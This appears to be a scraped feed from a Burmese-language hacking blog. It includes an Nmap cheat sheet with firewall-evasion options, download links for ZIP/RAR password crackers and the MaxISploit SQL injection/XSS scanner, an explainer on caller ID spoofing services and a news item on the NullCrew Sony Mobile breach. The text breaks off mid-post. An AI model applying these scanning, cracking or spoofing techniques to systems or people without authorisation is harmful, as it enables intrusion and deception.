<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnZSnLG_MkmN-P5gdt-66EZz3Wbu78PjTCPC_YpxUPl6KMUSgIfNhMmLKWYyldJGYEztREAQhAjIQLpa3Vb_F6Uqiy-rzBHNu6H7mzWDgvnqI4ATGpfdDM-mQ0X_gbZQcQj1CcC_tyIeo/s1600/zippasswordunlocker_mainscreen.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="220" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnZSnLG_MkmN-P5gdt-66EZz3Wbu78PjTCPC_YpxUPl6KMUSgIfNhMmLKWYyldJGYEztREAQhAjIQLpa3Vb_F6Uqiy-rzBHNu6H7mzWDgvnqI4ATGpfdDM-mQ0X_gbZQcQj1CcC_tyIeo/s320/zippasswordunlocker_mainscreen.jpg" width="320" /></a></div>
<br />
<br />
<br />
<br />
<br />
Download<br />
<a href="http://securityxploded.com/getfile_plus.php?id=6525" target="_blank">Zip pass cracker</a><br />
<br />
Download<br />
<a href="http://securityxploded.com/getfile_plus.php?id=6545" target="_blank">Rar pass cracker</a><br />
shwekoyantawhttp://www.blogger.com/profile/09091277533756466724noreply@blogger.com1tag:blogger.com,1999:blog-2967231180093766350.post-79067895479275619282012-09-04T20:32:00.002-07:002012-09-04T20:32:39.066-07:00Nmap Kung-Fu {Basic Scanning technique} <div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuOGDdoMDX0yAbS93xxuH36gN4dzUdYFYwJstlvwnzxjrH5a1IS1dLrVzIgfTuAAvXZ0vxzLgUuaRXtyUUY10JGkKkxPIqA1xBududBVzu-57GnoHHCF4_bJBlG4JGLxxujj-IKMxxD6I/s1600/nmap-401-demoscan-798x774.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="310" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuOGDdoMDX0yAbS93xxuH36gN4dzUdYFYwJstlvwnzxjrH5a1IS1dLrVzIgfTuAAvXZ0vxzLgUuaRXtyUUY10JGkKkxPIqA1xBududBVzu-57GnoHHCF4_bJBlG4JGLxxujj-IKMxxD6I/s320/nmap-401-demoscan-798x774.gif" width="320" /></a></div>
<div style="color: red;">
<br /></div>
<span style="color: red;">Nmap ဆိုတာနဲ ့ pentest သမားေတြေကာ
ဟက္ကာၾကီးေတြေကာ လက္စြဲထားရတာ ၾကားဖူးၾကမယ္ထင္ပါတယ္ ... host / server /
system တစ္ခု စေဖာက္ဖို ့ဆို အရင္ဆံုး/ပထမဆံုး step အၿဖစ္ nmap ကအဓိကေနရာက
ပါဝင္လုပ္ေဆာင္ပါတယ္ ... window သမားေတြအတြက္လည္းရွိပါတယ္.. ဒါေပမယ့္
window မွာသံုးရတာေတာ့ တမ်ိဳးပဲဗ် က်ေနာ့္အထင္ ... <span rel="lightbox"><img alt="Posted Image" class="bbc_img" src="http://mmhackforums.com//public/style_emoticons/default/smile.png" /></span><br />
<br />
nmap ဆိုတာဘာလဲ >>> </span><a class="bbc_url" href="http://nmap.org/" rel="nofollow external" style="color: red;" title="External link">http://nmap.org/</a><br style="color: red;" />
<span style="color: red;">window သမားေတြအတြက္ >>> </span><a class="bbc_url" href="http://nmap.org/book/inst-windows.html" rel="nofollow external" style="color: red;" title="External link">http://nmap.org/book/inst-windows.html</a><br style="color: red;" />
<strong class="bbc" style="color: red;"><span style="font-size: 18px;">Nmap Online tool >>> </span></strong><a class="bbc_url" href="http://nmap-online.com/" rel="nofollow external" style="color: red;" title="External link">http://nmap-online.com/</a><span style="color: red;"> // မိုက္လယ္ဟ online ရွိပီးသား... ခုမွတိတယ္... ဟီး....</span><br style="color: red;" />
<br style="color: red;" />
<span rel="lightbox" style="color: red;">ေအာက္မွာ nmap ရဲ ့ basic scanning
techniques ေလးေတြကိုေတြ ့ရမွာပါ ... အေတာ္အသံုးဝင္ပါတယ္ ... ခုေလာေလာဆယ္
လိုတယ္လို ့ေမာင္ဒုတ္ မေၿပာပါဖူး ... ေနာင္တစ္ခ်ိန္
လိုကိုလိုလာပါလိမ့္မယ္.. အဲ့ခ်ိန္က်ရင္ ဒီပို ့စ္ေလးကို သတိရရင္ပဲ .. ပို
့တင္ရက်ိဳး နပ္ပါတယ္ .. <img alt="Posted Image" class="bbc_img" src="http://mmhackforums.com//public/style_emoticons/default/smile.png" /></span><br style="color: red;" />
<br />
<span style="font-family: verdana,geneva,sans-serif;"><span class="bbc_underline"><span style="font-size: 24px;"><strong class="bbc"><span style="color: red;">Basic Scanning Techniques</span></strong></span></span><br />
<br />
Scan a single target —> <span style="color: lime;">nmap [target]</span><br />
<br />
Scan multiple targets —> <span style="color: lime;">nmap [target1,target2,etc]</span><br />
<br />
Scan a list of targets —-> <span style="color: lime;">nmap -iL [list.txt]</span><br />
<br />
Scan a range of hosts —-> <span style="color: lime;">nmap [range of IP addresses]</span><br />
<br />
Scan an entire subnet —-> <span style="color: lime;">nmap [IP address/cdir]</span><br />
<br />
Scan random hosts —-> <span style="color: lime;">nmap -iR [number]</span><br />
<br />
Excluding targets from a scan —><span style="color: lime;"> nmap [targets] –exclude [targets]</span><br />
<br />
Excluding targets using a list —> <span style="color: lime;">nmap [targets] –excludefile [list.txt</span>]<br />
<br />
Perform an aggressive scan —> <span style="color: lime;">nmap -A [target]</span><br />
<br />
Scan an IPv6 target —> <span style="color: lime;">nmap -6 [target]</span><br />
<br />
<strong class="bbc"><span style="color: red;">Discovery Options</span></strong><br />
<br />
Perform a ping scan only —> <span style="color: lime;">nmap -sP [target]</span><br />
<br />
Don’t ping —> <span style="color: lime;">nmap -PN [target]</span><br />
<br />
TCP SYN Ping —> <span style="color: lime;">nmap -PS [target]</span><br />
<br />
TCP ACK ping —-> <span style="color: lime;">nmap -PA [target]</span><br />
<br />
UDP ping —-> <span style="color: lime;">nmap -PU [target]</span><br />
<br />
SCTP Init Ping —> <span style="color: lime;">nmap -PY [target]</span><br />
<br />
ICMP echo ping —-> <span style="color: lime;">nmap -PE [target]</span><br />
<br />
ICMP Timestamp ping —> <span style="color: lime;">nmap -PP [target]</span><br />
<br />
ICMP address mask ping —> <span style="color: lime;">nmap -PM [target]</span><br />
<br />
IP protocol ping —-> <span style="color: lime;">nmap -PO [target]</span><br />
<br />
ARP ping —> <span style="color: lime;">nmap -PR [target]</span><br />
<br />
Traceroute —> <span style="color: lime;">nmap –traceroute [target]</span><br />
<br />
Force reverse DNS resolution —> <span style="color: lime;">nmap -R [target]</span><br />
<br />
Disable reverse DNS resolution —> <span style="color: lime;">nmap -n [target]</span><br />
<br />
Alternative DNS lookup —> <span style="color: lime;">nmap –system-dns [target]</span><br />
<br />
Manually specify DNS servers —> <span style="color: lime;">nmap –dns-servers [servers] [target]</span><br />
<br />
Create a host list —-> <span style="color: lime;">nmap -sL [targets]</span><br />
<br />
<strong class="bbc"><span style="color: red;">Advanced Scanning Options</span></strong><br />
<br />
TCP SYN Scan —> <span style="color: lime;">nmap -sS [target]</span><br />
<br />
TCP connect scan —-> <span style="color: lime;">nmap -sT [target]</span><br />
<br />
UDP scan —-> <span style="color: lime;">nmap -sU [target]</span><br />
<br />
TCP Null scan —-> <span style="color: lime;">nmap -sN [target]</span><br />
<br />
TCP Fin scan —><span style="color: lime;"> nmap -sF [target]</span><br />
<br />
Xmas scan —-> <span style="color: lime;">nmap -sX [target]</span><br />
<br />
TCP ACK scan —> <span style="color: lime;">nmap -sA [target]</span><br />
<br />
Custom TCP scan —-> <span style="color: lime;">nmap –scanflags [flags] [target]</span><br />
<br />
IP protocol scan —-> <span style="color: lime;">nmap -sO [target]</span><br />
<br />
Send Raw Ethernet packets —-> <span style="color: lime;">nmap –send-eth [target]</span><br />
<br />
Send IP packets —-> <span style="color: lime;">nmap –send-ip [target]</span><br />
<br />
<strong class="bbc"><span style="color: red;">Port Scanning Options</span></strong><br />
<br />
Perform a fast scan —> <span style="color: lime;">nmap -F [target]</span><br />
<br />
Scan specific ports —-> <span style="color: lime;">nmap -p [ports] [target]</span><br />
<br />
Scan ports by name —-> <span style="color: lime;">nmap -p [port name] [target]</span><br />
<br />
Scan ports by protocol —-> <span style="color: lime;">nmap -sU -sT -p U:[ports],T:[ports] [target]</span><br />
<br />
Scan all ports —-> <span style="color: lime;">nmap -p “*” [target]</span><br />
<br />
Scan top ports —–> <span style="color: lime;">nmap –top-ports [number] [target]</span><br />
<br />
Perform a sequential port scan —-> <span style="color: lime;">nmap -r [target]</span><br />
<br />
<strong class="bbc"><span style="color: red;">Version Detection</span></strong><br />
<br />
Operating system detection —-> <span style="color: lime;">nmap -O [target]</span><br />
<br />
Submit TCP/IP Fingerprints —-> <span style="color: lime;">www.nmap.org/submit/</span><br />
<br />
Attempt to guess an unknown —-> <span style="color: lime;">nmap -O –osscan-guess [target]</span><br />
<br />
Service version detection —-> <span style="color: lime;">nmap -sV [target]</span><br />
<br />
Troubleshooting version scans —-> <span style="color: lime;">nmap -sV –version-trace [target]</span><br />
<br />
Perform a RPC scan —-> <span style="color: lime;">nmap -sR [target]</span><br />
<br />
<strong class="bbc"><span style="color: red;">Timing Options</span></strong><br />
<br />
Timing Templates —-> <span style="color: lime;">nmap -T [0-5] [target]</span><br />
<br />
Set the packet TTL —-> <span style="color: lime;">nmap –ttl [time] [target]</span><br />
<br />
Minimum of parallel connections —-><span style="color: lime;"> nmap –min-parallelism [number] [target]</span><br />
<br />
Maximum of parallel connection —-> <span style="color: lime;">nmap –max-parallelism [number] [target]</span><br />
<br />
Minimum host group size —–> <span style="color: lime;">nmap –min-hostgroup [number] [targets]</span><br />
<br />
Maximum host group size —-> <span style="color: lime;">nmap –max-hostgroup [number] [targets]</span><br />
<br />
Maximum RTT timeout —–> <span style="color: lime;">nmap –initial-rtt-timeout [time] [target]</span><br />
<br />
Initial RTT timeout —-> <span style="color: lime;">nmap –max-rtt-timeout [TTL] [target]</span><br />
<br />
Maximum retries —-> <span style="color: lime;">nmap –max-retries [number] [target]</span><br />
<br />
Host timeout —-> <span style="color: lime;">nmap –host-timeout [time] [target]</span><br />
<br />
Minimum Scan delay —-> <span style="color: lime;">nmap –scan-delay [time] [target]</span><br />
<br />
Maximum scan delay —-> <span style="color: lime;">nmap –max-scan-delay [time] [target]</span><br />
<br />
Minimum packet rate —-><span style="color: lime;"> nmap –min-rate [number] [target]</span><br />
<br />
Maximum packet rate —-> <span style="color: lime;">nmap –max-rate [number] [target]</span><br />
<br />
Defeat reset rate limits —-> <span style="color: lime;">nmap –defeat-rst-ratelimit [target]</span><br />
<br />
<strong class="bbc"><span style="color: red;">Firewall Evasion Techniques</span></strong><br />
<br />
Fragment packets —-> <span style="color: lime;">nmap -f [target]</span><br />
<br />
Specify a specific MTU —-> <span style="color: lime;">nmap –mtu [MTU] [target]</span><br />
<br />
Use a decoy —-> <span style="color: lime;">nmap -D RND: [number] [target]</span><br />
<br />
Idle zombie scan —> <span style="color: lime;">nmap -sI [zombie] [target]</span><br />
<br />
Manually specify a source port —-> <span style="color: lime;">nmap –source-port [port] [target]</span><br />
<br />
Append random data —-> <span style="color: lime;">nmap –data-length [size] [target]</span><br />
<br />
Randomize target scan order —-> <span style="color: lime;">nmap –randomize-hosts [target]</span><br />
<br />
Spoof MAC Address —-> <span style="color: lime;">nmap –spoof-mac [MAC|0|vendor] [target]</span><br />
<br />
Send bad checksums —-> <span style="color: lime;">nmap –badsum [target]</span><br />
<br />
<strong class="bbc"><span style="color: red;">Output Options</span></strong><br />
<br />
Save output to a text file —-> <span style="color: lime;">nmap -oN [scan.txt] [target]</span><br />
<br />
Save output to a xml file —> <span style="color: lime;">nmap -oX [scan.xml] [target]</span><br />
<br />
Grepable output —-> <span style="color: lime;">nmap -oG [scan.txt] [target]</span><br />
<br />
Output all supported file types —-> <span style="color: lime;">nmap -oA [path/filename] [target]</span><br />
<br />
Periodically display statistics —-><span style="color: lime;"> nmap –stats-every [time] [target]</span><br />
<br />
133t output —-> <span style="color: lime;">nmap -oS [scan.txt] [target]</span><br />
<br />
<strong class="bbc"><span style="color: red;">Troubleshooting and debugging</span></strong><br />
<br />
Help —> <span style="color: lime;">nmap -h</span><br />
<br />
Display Nmap version —-><span style="color: lime;"> nmap -V</span><br />
<br />
Verbose output —-> <span style="color: lime;">nmap -v [target]</span><br />
<br />
Debugging —-><span style="color: lime;"> nmap -d [target]</span><br />
<br />
Display port state reason —-> <span style="color: lime;">nmap –reason [target]</span><br />
<br />
Only display open ports —-> <span style="color: lime;">nmap –open [target]</span><br />
<br />
Trace packets —> <span style="color: lime;">nmap –packet-trace [target]</span><br />
<br />
Display host networking —> <span style="color: lime;">nmap –iflist</span><br />
<br />
Specify a network interface —> <span style="color: lime;">nmap -e [interface] [target]</span><br />
<br />
<strong class="bbc"><span style="color: red;">Nmap Scripting Engine</span></strong><br />
<br />
Execute individual scripts —> <span style="color: lime;">nmap –script [script.nse] [target]</span><br />
<br />
Execute multiple scripts —-><span style="color: lime;"> nmap –script [expression] [target]</span><br />
<br />
<span style="color: yellow;">Script categories —-> all, auth, default, discovery, external, intrusive, malware, safe, vuln</span><br />
<br />
Execute scripts by category —-> <span style="color: lime;">nmap –script [category] [target]</span><br />
<br />
Execute multiple scripts categories —-><span style="color: lime;"> nmap –script [category1,category2, etc]</span><br />
<br />
Troubleshoot scripts —-> <span style="color: lime;">nmap –script [script] –script-trace [target]</span><br />
<br />
Update the script database —-> <span style="color: lime;">nmap –script-updatedb</span><br />
<br />
<strong class="bbc"><span style="color: red;">Ndiff</span></strong><br />
<br />
Comparison using Ndiff —-> <span style="color: lime;">ndiff [scan1.xml] [scan2.xml]</span><br />
<br />
Ndiff verbose mode —-> <span style="color: lime;">ndiff -v [scan1.xml] [scan2.xml]</span><br />
<br />
XML output mode —-> <span style="color: lime;">ndiff –xml [scan1.xm] [scan2.xml]</span></span><br />
<br />
<strong class="bbc"><span style="color: red;">./preview</span></strong><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuOGDdoMDX0yAbS93xxuH36gN4dzUdYFYwJstlvwnzxjrH5a1IS1dLrVzIgfTuAAvXZ0vxzLgUuaRXtyUUY10JGkKkxPIqA1xBududBVzu-57GnoHHCF4_bJBlG4JGLxxujj-IKMxxD6I/s1600/nmap-401-demoscan-798x774.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="620" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuOGDdoMDX0yAbS93xxuH36gN4dzUdYFYwJstlvwnzxjrH5a1IS1dLrVzIgfTuAAvXZ0vxzLgUuaRXtyUUY10JGkKkxPIqA1xBududBVzu-57GnoHHCF4_bJBlG4JGLxxujj-IKMxxD6I/s640/nmap-401-demoscan-798x774.gif" width="640" /></a></div>
<strong class="bbc"><span style="color: red;"> </span></strong><span style="font-family: verdana,geneva,sans-serif;"><span style="color: lime;"> </span></span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkkcFb3jy45rbr-qhtH6SVuLYg5TZIUspzre_t2nXrgnGNeOdIh2KPdyb03Nrq8MxEoB55HewG_SWWaaE_7WW4KQoGxIK6xncSR4J75-Pn2VrWHA-SvPD2ADJczt4YPJSc0TM8vn0ypUU/s1600/zenmap-multi-1220x700.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="366" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkkcFb3jy45rbr-qhtH6SVuLYg5TZIUspzre_t2nXrgnGNeOdIh2KPdyb03Nrq8MxEoB55HewG_SWWaaE_7WW4KQoGxIK6xncSR4J75-Pn2VrWHA-SvPD2ADJczt4YPJSc0TM8vn0ypUU/s640/zenmap-multi-1220x700.png" width="640" /></a></div>
credit:http://pentestlab.wordpress.com/<br />
copy from MHUshwekoyantawhttp://www.blogger.com/profile/09091277533756466724noreply@blogger.comtag:blogger.com,1999:blog-2967231180093766350.post-89527697008408690672012-09-03T06:27:00.003-07:002012-09-03T06:27:20.792-07:00Caller ID spoofing<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8kH0A4uQfpVsPjaqjOUGjqxHqdQZTPY3d5JCW-0PZ8-jSDGfx-t6sdAxEWVi1ecFPmBKyLOWSue8XB2EYc8s19slQF9HMHBSSZhje5QiGLgz0AwwTR5kWA8xSTADt_GGbo8uEZhq_cAk/s1600/black_phone-1024x687.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="428" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8kH0A4uQfpVsPjaqjOUGjqxHqdQZTPY3d5JCW-0PZ8-jSDGfx-t6sdAxEWVi1ecFPmBKyLOWSue8XB2EYc8s19slQF9HMHBSSZhje5QiGLgz0AwwTR5kWA8xSTADt_GGbo8uEZhq_cAk/s640/black_phone-1024x687.jpg" width="640" /></a></div>
<br />
<br />
ခုတေလာ cracking ေရာင္ေရာင္ hacking ေရာင္ေရာင္လုပ္ေနတာနဲ့ post ေတာင္မေရးျဖစ္ဘူးျဖစ္ေနတယ္။ ဘာေရးရမွန္းမသိတာလဲ ပါပါတယ္ <img alt=":D" class="wp-smiley" src="http://ghostarea.net/wp-includes/images/smilies/icon_biggrin.gif" />
။ စိတ္ကူးေလးေပါက္တုန္း ဗဟုသုတ ဆိုျပီး Spoofing အေျကာင္းေလးတစ္ခ်က္
ေျပာျကည့္ရေအာင္။ သိတဲ့ အတိုင္းပဲ က်ြန္ေတာ္က mobile hacking
အေျကာင္းတာဝန္ယူထားတယ္ဆိုေတာ့ Caller ID spoofing ေရးထားပါတယ္။
<span style="color: lime;">What is Spoofing ??</span>
Spoofing ဆိုတာကေတာ့ hackers ေတြရဲ့ technique တစ္မ်ိုးေပါ့။
အခ်က္အလက္တစ္ခုကို သိခ်င္တဲ့ အခါမ်ိုးတို့ ဒါမွမဟုတ္ ကိုယ့္ကို
မသိေစခ်င္တဲ့အခါမ်ိုးတို့မွာသံုးပါတယ္။ အဲ့ spoof ရဲ့ အဓိပဿပါယ္ ေလးက
အေျကာင္းအရာတစ္စံုတစ္ကိုဟာသ အျမင္နဲ့ တုတာကို ေျပာတာပါ။
<span style="color: lime;">What is Caller ID spoofing??</span>
Caller ID spoofing ဆိုတာက ဖုန္းေခါ္ခံရမယ့္လူဘက္က ေပါ္မဲ့ Caller ID ကို
လာေနက် station ကမဟုတ္ပဲ တစ္ျခား number အေနနဲ့ေဖာ္ ျပနိုင္တဲ့ telephone
network ရဲ့ ျဖစ္ေပါ္လာတဲ့ အေလ့အက်င့္တစ္ခုေပါ့။ ဥပမာ ျမန္မာနိုင္ငံက
သူငယ္ခ်င္းတစ္ေယာက္ ကို ကိုယ္က ဒီနုိင္ငံက နံပါတ္မဟုတ္ပဲ
တစ္ျခားနံပါတ္ျဖစ္ေအာင္ဖန္တီးျပီး ကိုယ္ဖုန္းနဲ့
ေခါ္တာမ်ိုးေပါ့။တစ္ဖက္လူကို မိမိ အေျကာင္း trace လိုက္လို့ မရေအာင္
လုပ္တဲ့ ပံုစံမ်ိုးျဖစ္ပါတယ္။ email spoofing လိုပဲ ဘယ္က ပို့မွန္းမသိေအာင္
ေနတဲ့ email sender အေန သေဘာမ်ိုးနဲ့ ဆက္သြယ္ျခင္းျဖစ္ပါတယ္။
ဘယ္နံပါတ္မ်ိုးမဆို Caller ID spoofing က caller ေတြ
အျကိုက္ဖန္တီးေပးနုိင္ပါတယ္။<span id="more-1337"></span>
<span style="color: lime;">Process of Providers</span>
ရုိးရွင္းတဲ့ spoofing service တစ္ခုရဲ့ process ကို ေျပာပါ့မယ္ ။ customer
တစ္ေယာက္က call spoofing company တစ္ခုမွာ Personal identification number
(PIN) တစ္ခုကို ဝယ္လိုက္တယ္ အဲ့ PIN က ခု prepaid ေတြလိုေပါ့ call time
အတိအက်ပါတယ္။ ဘယ္နွနာရီေျပာနုိင္မယ္ေပါ့ေလ။ အဲဒါနဲ့ customer က ေပးထားတဲ့
Company က ေပးတဲ့ number ကို dial လုပ္ သူရထားတဲ့ PIN ကို
နွိပ္မယ္။ျပီးေတာ့ customer က ေခါ္မယ့္ နံပါတ္ကို နွိပ္မယ္ျပီးရင္ Caller
ID ကို ေျပာင္းခ်င္တဲ့ နံပါတ္ေျပာင္းမယ္။ ဒါက User or customer ဘက္က
လုပ္တာ။ အဲ့ customer နွိပ္ျပီးတာနဲ့ တျပိုင္နက္ call က ဟို receive
လုပ္မယ္လူဆီကို company က လြွဲေပးလိုက္ျပီ။ အဲ့မွာ တင္ receive
လုပ္တဲ့့လူဘက္မွာ ဘယ္က မွန္းမသိေသာ Caller ID ေပါ္လာျပီေပါ့။
Web-based spoofing service ေတြက provider ေတြနဲ့ အေကာင့္ေတြလုပ္။ customer
ေတြကို သူတို့ website မွာ login ဝင္ျပီးရင္ form ကို
ျပည့္စံုေအာင္ျဖည့္။အမ်ားစု company ေတြ ေတာင္းတဲ့ အခ်က္ေတြက
<span style="color: blue;">၁.source number</span>
<span style="color: blue;"> ၂.destination number</span>
<span style="color: blue;"> ၃.caller ID number</span> ေတြပါပဲ။
ဥပမာအေနနဲ့ http://www.teleturd.com/ မွာသြားျကည့္လို့ရပါတယ္။တစ္ခ်ို့
company ေတြဆို အသံေျပာင္းလို့ရေအာင္ေတာင္ ထည့္ေပးပါေသးတယ္။
Caller ID spoofing ေတြကို ဘယ္လိုင္းေတြမွာ သံုးတာမ်ားလဲဆိုရင္ Voice Over
Internet Protocol( VoIP)နဲ့ Primary Rate
Interface(PRI)တို့မွာသံုးတာမ်ားပါတယ္။ ေနာက္ထပ္ spoofing method
ေတြရွိပါေသးတယ္။ orange boxing တို့ဘာတို့ ေပါ့။ဟိုတစ္ေခါက္က က်ြန္ေတာ္ red
boxing ေရးခဲ့ဖူးတယ္မလား။ ခု orange boxing ကသူ့အဆက္ <img alt=":D" class="wp-smiley" src="http://ghostarea.net/wp-includes/images/smilies/icon_biggrin.gif" />
။ က်ြန္ေတာ္ တစ္ေခါက္ေရးေပးခဲ့တယ့္ spoofapp ဆိုတဲ့ android apk က လဲ
caller id spoofing ပါပဲ။အဲ့ app ကေတာ့ US နဲ့ Canada မွာ ပဲ
ရတယ္လို့ေျပာပါတယ္။ ခုေနာက္ပိုင္း spoofing နဲ့ပတ္သတ္တဲ့ apk
ေတြအမ်ားျကီးထြက္လာပါေသးတယ္။ေနာက္ဆံုး က်ြန္ေတာ္သူငယ္ခ်င္းေပးတဲ့ msg spoof
apk ကေတာ့ txtmyanmar.apk ပါ။အခါသင့္ အခြင့္သာရင္ orange boxing
အေျကာင္းထပ္ေရးပါမယ္လို့ ကတိေပးရင္း ဒီေလာက္နဲ့ေက်နပ္မယ္လို့ထင္ပါတယ္ <img alt=":D" class="wp-smiley" src="http://ghostarea.net/wp-includes/images/smilies/icon_biggrin.gif" />
။ စာဖတ္ပရိတ္သတ္အေပါင္း ကိုယ္ေရာစိတ္ပါက်န္းမာခ်မ္းသာပါေစ။ ဒါက ဗဟုသုတ
အေနနဲ့ ေရးတာ ပါ ။ဒီနည္းေတြက Social engineering ေကာင္းရင္ ေကာင္းသေလာက္
အသံုးဝင္ပါတယ္။ထို့ေျကာင့္ ေနာက္တစ္ခုဆုေတာင္းတာက လူအခ်င္းခ်င္း
လွည့္ပတ္ျခင္း ကင္းရွင္းျကပါေစလို့ <img alt=":)" class="wp-smiley" src="http://ghostarea.net/wp-includes/images/smilies/icon_smile.gif" /> ။<br />
<br />
copy from ghostarea.net shwekoyantawhttp://www.blogger.com/profile/09091277533756466724noreply@blogger.com0tag:blogger.com,1999:blog-2967231180093766350.post-55672148989745389862012-09-02T06:51:00.002-07:002012-09-03T07:07:55.150-07:00Sony Mobile website hacked by NullCrew<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMee7Oec9AFodYSxAD-gBupCnTkkOZhwSVB75R1QIMPLzk4MIXFMvqUxOhZ6gO_r2nyxzmPX_kDBPcGeFZc4sAiLT0LwRZFMy0sIeoVZyXNZFNSCaVpFqjo97jQtdAiYrPfyYePLI96OE/s1600/index.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMee7Oec9AFodYSxAD-gBupCnTkkOZhwSVB75R1QIMPLzk4MIXFMvqUxOhZ6gO_r2nyxzmPX_kDBPcGeFZc4sAiLT0LwRZFMy0sIeoVZyXNZFNSCaVpFqjo97jQtdAiYrPfyYePLI96OE/s400/index.jpg" width="400" /></a></div>
<br />
ယခုႏွစ္အတြင္း ေနာက္ထပ္တစ္ၾကိမ္ အျဖစ္ Sony Mobile website သည္ေနာက္ထပ္တစ္ၾကိမ္ အျဖစ္ တိုက္ ခိုက္ခံခဲ့ရပါတယ္...။ www.sonymobile.com သည္ Hacker Group တစ္ခုျဖစ္ေသာ Null Crew အဖြဲ႕ မွတိုက္ ခိုက္ခ်င္ကိုခံခဲ့ရျပီး user အမ်ားစုရဲ႕ အခ်က္အလက္မ်ားကို ဖြင့္ခ်ေဖာ္ထုတ္ ခဲ့ပါတယ္...။ဒီသတင္းအခ်က္ အလက္ကိုလဲ တိုက္ခိုက္သူမ်ားျဖစ္တဲ့ Null Crew ရဲ႕ twitter account ထဲမွာေဖာ္ျပခဲ့ျခင္းျဖစ္ပါတယ္...။<br />
<br />
သူတို႕ဟာ ထြင္းေဖါက္ ရယူထားေသာသတင္းအခ်က္ အလက္ အစုအစည္းမ်ားကို Pastebin တြင္လဲ ေဖာ္ျပ ထားျပီး ေအာက္ပါ သတိေပးစာကို ေဖာ္ျပခဲ့ပါတယ္....။<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrnq963L-TDjbTmHQuBh62hclE7cHqkhUWdESd46ad2QB6L4SaUuPJe7h3rbh9r113KgXpc-39x8yh1O2ssxMSS9F7X89yf8rxDGqwKWESNbuCahk-Uu-TY0ZOg3djZtSWRTvHcRUAZK4/s1600/untitled.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrnq963L-TDjbTmHQuBh62hclE7cHqkhUWdESd46ad2QB6L4SaUuPJe7h3rbh9r113KgXpc-39x8yh1O2ssxMSS9F7X89yf8rxDGqwKWESNbuCahk-Uu-TY0ZOg3djZtSWRTvHcRUAZK4/s1600/untitled.JPG" /></a></div>
<u>Stats of Dumps</u><br />
<br />
<ul>
<li>441 ေယာက္ေသာ အသံုးျပဳသူမ်ား၏ username မ်ား email အေကာင့္မ်ား×××××</li>
<li>Think_users Table မွ 24 ေယာက္ေသာ user မ်ား၏ Hash passwords မ်ားပါသြားျခင္း××××</li>
<li>admin_users Table မွ 3 ေယာက္ေသာ Admin မ်ား၏ အခ်က္အလက္မ်ားပါ၀င္သြားျခင္း×××××</li>
</ul>
<br />
တို႕ပဲျဖစ္ၾကပါတယ္...။ <br />
<br />
ref: <a href="http://thehackernews.com/">http://thehackernews.com</a><br />
post by shwekoyantawshwekoyantawhttp://www.blogger.com/profile/09091277533756466724noreply@blogger.com0tag:blogger.com,1999:blog-2967231180093766350.post-3769953560861234982012-09-02T06:51:00.001-07:002012-09-03T06:28:19.501-07:00[Tool]MaxISploit SQLi , XSS , Admin login and shared hosting scanner[/Tool]<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTbAzIqVTWSZyfyyWAXqTOOct4-WOjgQ9eb14fnFcrll5-jjvtCLlbMS5CgAHCqR_rriFZBiB24GlVDeI6qIVqzvvySFtIgIer4-LNkgMFI7EfFpiRJGbecpfqdpdO4SKwfQO1V4dIIMU/s1600/untitled.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="370" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTbAzIqVTWSZyfyyWAXqTOOct4-WOjgQ9eb14fnFcrll5-jjvtCLlbMS5CgAHCqR_rriFZBiB24GlVDeI6qIVqzvvySFtIgIer4-LNkgMFI7EfFpiRJGbecpfqdpdO4SKwfQO1V4dIIMU/s640/untitled.JPG" width="640" /></a></div>
<br />
<br />
HF ကရတာေနာက္ေတာ့ မွ အသံုးျပဳပံု tuto ေရးေပးမယ္...။မအားေသးလို႕ပါ...။<br />
<br />
လိုခ်င္ရင္ေအာက္ပါလင့္ကေနယူႏိုင္ပါတယ္...။<br />
<br />
<a href="http://code.google.com/p/maxisploit-scanner/"><code>http://code.google.com/p/maxisploit-scanner/</code></a><br />
<br />
<a class="normal12blue" href="http://www.ziddu.com/download/20256523/MaxISploit.rar.html"><b>http://www.ziddu.com/download/20256523/MaxISploit.rar.html</b></a><code> </code><br />
<br />
<code>သူ႕ Function ေတြကေတာ့ေအာက္ပါအတိုင္းျဖစ္ပါတယ္...။</code><br />
<br />
1.<span style="font-weight: bold;"><span style="color: red;">SQL injection : </span></span><br />
a)Error based: it scans for vulnerable websites based on common SQL errors for variety of databases. <br />
b)Difference (true/false) scan: it scans for sites that do not display
SQL errors but yet are vulnerable , the concept behind this scan is true
/ false query to the database which will give different answers which
will then be scanned and in case of difference in length and content
site will be considered vulnerable. <br />
2.<span style="color: red;"><span style="font-weight: bold;">XSS scanner</span></span>
: it encrypts XSS vector and tries to scan result from web server , if
